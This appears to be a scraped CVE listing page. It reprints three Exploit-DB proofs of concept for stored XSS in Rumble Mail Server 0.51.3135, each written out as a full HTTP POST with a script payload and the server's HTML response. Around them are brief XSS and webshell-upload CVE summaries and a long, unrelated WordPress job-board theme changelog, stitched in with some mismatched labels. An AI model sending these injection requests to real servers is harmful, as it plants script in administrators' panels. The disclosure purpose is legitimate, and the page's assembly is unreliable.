A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43462: Offensive Security’s Exploit Database Archive

In the Noo JobMonster WordPress theme before 4.5.2.9 JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.

CVE-2022-1170: Jobmonster - Job Board WordPress Theme

There is a XSS vulnerability in Careerfy.

CVE-2022-1169

There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp Careerup WordPress theme before 2.3.1, via the filter parameters.

CareerUp – Job Board WordPress theme is a complete Job Board WordPress theme that allows you to create a useful and easy to use job listings website . Using CareerUp theme, you can create a complete & fully Responsive job portal, career platform to run human resource management, recruitment or job posting website. CareerUp is not just a job board theme, it’s the best WordPress job portal template choice for anyone who wants a simple job script that makes money.

**Features**

*   **Restrict Job**  
    **\- View job page:**
    *   All (Users, Guests)
    *   All Register Users
    *   Register Candidates (All registered candidates can view jobs.)
    *   Always Hidden
*   **Restrict Candidate**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   Register Employers with package (Registered employers who purchased CV Package can view candidates.)
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Employer can view only their own applicants candidates.)
    *   Register Employers (All registered employers can view candidates.)
    *   All users can view candidate, but only employers with package can see contact info (Users who purchased Contact Package can see contact info.)
*   **Restrict Employer**  
    **\- View candidate page:**
    
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
    
    **\- View candidate contact info:**
    *   All (Users, Guests)
    *   All Register Users
    *   Only Applicants (Candidate can view only their own applicants employers.)
    *   Register Candidates (All registered candidates can view employers.)
    *   Always Hidden
*   Add a job in frontend
*   Highly Customizable
*   Extensive Admin Interface
*   One click Demo Import
*   No coding knowledge required
*   Page Templates
*   Responsive & Retina Ready
*   Large collection of useful inner pages
*   Choose your grid size
*   Boxed layout option
*   Powerful typography options
*   Translation ready
*   WooCommerce compatible
*   Powerful sorting options for job listings and resumes
*   Multiple ways of showcasing job listings and resumes
*   Listing List shortcode
*   Listing Search shortcode
*   Listing Advanced Search shortcode
*   Listing Simple Search shortcode
*   Resume List shortcode
*   Resume Advanced Search shortcode
*   User login
*   User Dashboard page template
*   Facebook, Google, Twitter, LinkedIn login
*   Facebook, Google, Twitter, LinkedIn apply job
*   Pricing Tables shortcode
*   Comparison Pricing Tables shortcode
*   Smooth Page Transitions
*   Fontawsome & Flaticon
*   User Login Form

**Updates History:**

**Version 2.3.24 – 24 March 2022**

\* Update Elementor

**Version 2.3.23 – 05 November 2021**

\* Update register form

**Version 2.3.22 – 15 September 2021**

\* Update filter job

**Version 2.3.21 – 01 July 2021**

\* Update Website Preload

**Version 2.3.20 – 10 June 2021**

\* Updated select2

**Version 2.3.19 – 31 May 2021**

\* Updated employer logo default

**Version 2.3.18 – 14 May 2021**

\* Added Fields Manager

**Version 2.3.17 – 28 April 2021**

\* Updated Elementor

**Version 2.3.16 – 26 April 2021**

\* Updated Elementor

**Version 2.3.15 – 14 April 2021**

\* Updated WooCommerce
\* Updated Language

**Version 2.3.14 – 17 March 2021**

\* Updated related
\* Fixed pricing package

**Version 2.3.13 – 16 March 2021**

\* Updated pagination Jobs, Employers, Candidates

**Version 2.3.12 – 19 February 2021**

\* Improved responsive
\* Improved restrict Job, Employer, Candidate

**Version 2.3.11 – 15 January 2021**

\* Updated WooCommerce

**Version 2.3.10 – 03 November 2020**

\* Updated restrict jobs, candidate, employer
\* Updated application status

**Version 2.3.9 – 01 October 2020**

\* Updated get jobs by multiple taxonomies
\* Updated Job map
\* Updated Job preview

**Version 2.3.8 – 21 August 2020**

\* Updated candidate category list
\* Update them style

**Version 2.3.7 – 21 August 2020**

\* Updated WooCommerce 4.4

**Version 2.3.6 – 14 August 2020**

\* Fixed javascript error
\* Improve geolocation

**Version 2.3.5 – 12 August 2020**

\* Fixed javascript error
\* Updated demo import

**Version 2.3.4 – 05 August 2020**

\* Updated plugin "WP Job Board" 2.1.3
\* Updated search location
\* Updated Employer | Candidate email
\* Updated Employer my jobs

**Version 2.3.3 – 13 July 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.2.2
\* Add element "Apus Jobs Maps" to show maps in home page

**Version 2.3.2 – 10 July 2020**

\* Updated plugin "WP Job Board" 2.1.2
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.2.1
\* Updated WooCommerce 4.3
\* Fixed Urgent/Featured jobs

**Version 2.3.1 – 18 June 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.1.1
\* Updated filter url
\* Updated texts
\* Added update checker

**Version 2.3.0 – 29 May 2020**

\* Updated plugin "WP Job Board" 2.1.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.1.0
\* Updated job filter
\* Updated Resume package
\* Added job restrict
\* Added recaptcha for lost password form
\* Added ajax handles
\* Fixed send email alert (jobs, candidates)

**Version 2.2.2 – 26 May 2020**

\* Updated plugin "WP Job Board" 2.0.5
\* Updated mapbox
\* Fixed php error
\* Updated contact form
\* Updated candidate custom fields

**Version 2.2.1 – 06 May 2020**

\* Updated WooCommerce
\* Fixed filter location list

**Version 2.2.0 – 04 May 2020**

\* Updated plugin "WP Job Board" 2.0.3
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.3
\* Added 2 Home pages
\* Added 2 Job details page
\* Added 2 Employer page
\* Added 2 Candidate pages
\* Added 2 job listing style
\* Added option change color for Urgent, Featured job, employer, candidate
\* Added options for hidden Register form fields
\* Added job suggestion search
\* Updated filter results
\* Updated email template
\* Fixed social login

**Version 2.1.1 – 31 March 2020**

\* Updated rating review

**Version 2.1.0 – 30 March 2020**

\* Updated plugin "WP Job Board" 2.0.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.2
\* Add Employee for Employer
\* Add RSS Feed Jobs
\* Updated permalink
\* Updated phone display
\* Updated WooCommerce
\* Fixed facebook login

**Version 2.0.3 – 03 March 2020**

\* Updated plugin "WP Job Board" 1.3.2
\* Updated locations
\* Updated Filter count

**Version 2.0.2 – 29 February 2020**

\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.1
\* Fixed pricing package

**Version 2.0.1 – 27 February 2020**

\* Updated responsive
\* Updated demo import

**Version 2.0.0 – 27 February 2020**

\* Updated more 5 home page
\* Updated plugin "WP Job Board" 1.3.0
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 3.0.0
\* Updated location
\* Updated Elementor elements
\* Added candidate search form
\* Added field location list for Job search form
\* Added package with WooCommerce Subscription
\* Added filter by Employers

**Version 1.1.24 – 04 February 2020**

\* Updated plugin "WP Job Board" 1.2.24
\* Updated submit job preview
\* Updated responsive
\* Updated candidate filter location
\* Updated employer filter location
\* Fixed submit job preview

**Version 1.1.23 – 31 January 2020**

\* Updated plugin "WP Job Board" 1.2.23
\* Updated WooCommerce 3.9.0
\* Updated search form

**Version 1.1.22 – 20 December 2019**

\* Updated plugin "WP Job Board" 1.2.20
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 2.0.5
\* Added Approved for Application
\* Fixed Filter widgets Jobs, Employers, Candidates
\* Added taxonomy multiple select field
\* Added User search ajax fields
\* Added Employer view all jobs
\* Updated my jobs

**Version 1.1.21 – 12 December 2019**

\* Updated plugin "WP Job Board" 1.2.19
\* Updated Job Preview
\* Updated Menu class
\* Updated price format
\* Updated job expired

**Version 1.1.20 – 27 November 2019**

\* Updated plugin "WP Job Board" 1.2.18
\* Added sort by for packages
\* Updated candidate shortlist
\* Updated reset password

**Version 1.1.19 – 25 November 2019**

\* Updated plugin "WP Job Board" 1.2.17
\* Updated job simple search
\* Updated job expired date

**Version 1.1.18 – 21 November 2019**

\* Updated plugin "WP Job Board" 1.2.16
\* Updated search location
\* Updated filter
\* Updated custom field placeholder
\* Updated user approve

**Version 1.1.17 – 13 November 2019**

\* Updated plugin "WP Job Board" 1.2.15
\* Updated email apply
\* Updated Google Maps
\* Updated WooCommerce 3.8
\* Fixed Search Form Location

**Version 1.1.16 – 07 November 2019**

\* Updated plugin "WP Job Board" 1.2.14
\* Fixed submit job error

**Version 1.1.15 – 05 November 2019**

\* Updated plugin "WP Job Board" 1.2.13
\* Updated listing count
\* Updated breadcrumbs

**Version 1.1.14 – 21 October 2019**

\* Updated plugin "WP Job Board" 1.2.12
\* Updated job button style
\* Improved Job filter Widget
\* Improved Candidate filter Widget
\* Improved Employer filter Widget

**Version 1.1.13 – 9 October 2019**

\* Added translate Menu text
\* Added loading for reset password

**Version 1.1.12 – 27 September 2019**

\* Updated plugin "WP Job Board" 1.2.10
\* Updated Recaptcha
\* Update contact form email template
\* Added filter taxonomies

**Version 1.1.11 – 16 September 2019**

\* Updated plugin "WP Job Board" 1.2.9
\* Updated plugin "WP Job Board - WooCommerce Paid Listings" 2.0.3
\* Updated clear location
\* Update submit form

**Version 1.1.10 – 13 September 2019**

\* Updated plugin "WP Job Board" 1.2.8
\* Added placeholder image
\* Fixed filter Employer/Candidate
\* Fixed Pagination
\* Updated ajax filter
\* Updated social share
\* Updated Email variable
\* Updated Linkedin login
\* Updated submit form

**Version 1.1.9 – 30 August 2019**

\* Updated plugin "WP Job Board" 1.2.7
\* Added candidate tags
\* Fixed custom field
\* Add Google Structure data
\* Fixed candidate salary types
\* Fixed Translate

**Version 1.1.8 – 23 August 2019**

\* Updated plugin "WP Job Board" 1.2.6
\* Updated date field
\* Added email template for apply job
\* Add page settings for after login
\* Add relist expired job
\* Fixed apply job with complete resume
\* Fixed Salary format

**Version 1.1.7 – 13 August 2019**

\* Updated plugin "WP Job Board" 1.2.3
\* Added Undo reject applicant
\* Updated WooComemrce 3.7
\* Updated spelling

**Version 1.1.6 – 12 August 2019**

\* Updated plugin "WP Job Board" 1.2.3
\* Updated location search
\* Updated maps default location

**Version 1.1.5 – 10 August 2019**

\* Updated plugin "WP Job Board" 1.2.2
\* Added employer restrict review
\* Added candidate restrict review
\* Update date format
\* Added Terms and Conditions

**Version 1.1.4 – 08 August 2019**

\* Updated plugin "WP Job Board" 1.2.0
\* Compatible with WPML
\* Improved responsive
\* Updated profile url field

**Version 1.1.3 – 07 August 2019**

\* Added simple jobs widget
\* Added simple candidates widget
\* Added simple employers widget
\* Added editable profile url
\* Added Apply job with complete resume

**Version 1.1.2 – 02 August 2019**

\* Added video for candidate/employer
\* Added popup image for candidate portfolio
\* Updated plugin "WP Job Board" 1.1.2

**Version 1.1.1 – 01 August 2019**

\* Updated download CV
\* Fixed error with old version WP Job Board
\* Fixed filter in job List v3

**Version 1.1.0 – 31 July 2019**

\* Compatible with WP Job Manager 1.1.0
\* Fixed indeed job import
\* Added restrict employer
\* Added restrict candidate
\* Added approve user register
\* Added approve resume
\* Added Resume download
\* Added changeable Miles/Kilometer
\* Added Free/paid apply for candidate
\* Added CV package
\* Added Contact candidate package
\* Added Resume package
\* Added Candidate package
\* Fixed Job package expiry date
\* Fixed error with WooCommerce 3.x

**Version 1.0.10 – 18 July 2019**

\* Fixed job tabs
\* Updated plugin "WP Job Board" version 1.0.13

**Version 1.0.9 – 16 July 2019**

\* Update register user
\* Update plugin "WP Job Board" to version 1.0.12

**Version 1.0.8 – 12 July 2019**

\* Updated import demo data

**Version 1.0.7 – 12 July 2019**

\* Updated Spelling text
\* Updated plugin "WP Job Board" version 1.0.11
\* Fixed search by jobs, employer, candidate
\* Fixed filter candidate

**Version 1.0.6 – 11 July 2019**

\* Updated plugin "Wp Job Board" to version 1.0.10
\* Updated expired job
\* Updated messages system
\* Updated demo import

**Version 1.0.5 – 09 July 2019**

\* Updated plugin "Wp Job Board" to version 1.0.9
\* Updated filter for jobs/candidate shortlist
\* Updated filter for following
\* Updated filter for applicants
\* Updated Applicants page
\* Added reject applicant
\* Added filter count
\* Fixed expired job
\* Improved filter jobs/candidate/employer

**Version 1.0.4 – 05 July 2019**

\* Added filter count
\* Improved filter job
\* Updated plugin "WP Job Board" to version 1.0.4

**Version 1.0.3 – 02 July 2019**

\* Fixed responsive sidebar

**Version 1.0.2 – 28 June 2019**

\* Fixed job style
\* Fixed job tabs layout
\* Fixed Register user
\* Improved urgent label style
\* Improved import demo data
\* Add change header mobile color

**Version 1.0.1 – 26 June 2019**

\* Updated demo data
\* Improve header style

**Version 1.0.0 – 25 June 2019**

\* First release

CVE-2022-1167: CareerUp - Job Board WordPress Theme

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature

CVE-2022-1164

The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.22.9 does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.

CVE-2022-0864

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the (1) domain and (2) path parameters.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Info
    The parameters `domain` and `path` are vulnerable to stored XSS.
    
    # Exploit:
    POST /domains HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 119
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
    Upgrade-Insecure-Requests: 1
    
    domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h2>Domains</h2>
    <p>
      <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
    			<div>
    			<div >
    				<div class='form_key'>
    					Domain name:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="domain"/>
    				</div>
    			</div>
    
    			<div>
    				<div class='form_key'>
    					Optional alt. storage path:
    				</div>
    				<div class='form_value'>
    					<input type="text" name="path"/>
    				</div>
    			</div>
    
    
    			<div class='form_el' id='domainsave' >
    				<div class='form_key'>
    						<input type="hidden" name="create" value="true"/>
    					<input class="button" type="submit" value="Save domain"/>
    					<input class="button"  type="reset" value="Reset"/>
    				</div>
    			</div>
    			<br/><br/><br/><br/><br />
    			</div>
    			</form>
    			</td></tr></table></p>
    <p>&nbsp;</p>
    <table class="elements" border='0' cellpadding='5' cellspacing='1'>
      <tr><th>Domain</th><th>Actions</th></tr>
    <tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43459: Offensive Security’s Exploit Database Archive

Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /settings:save HTTP/1.1
    Host: 127.0.0.1:2580
    Connection: keep-alive
    Content-Length: 343
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46YWRtaW4=
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1:2580
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1:2580/settings
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    
    save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
    HTTP/1.1 302 Moved
    Location: /settings:save
    
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on <script>alert(xss.com)</script><br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
      <h1>Server settings</h1>
    
    Saving config/rumble.conf
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

CVE-2021-43461: Offensive Security’s Exploit Database Archive

An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component.

Tag

#xss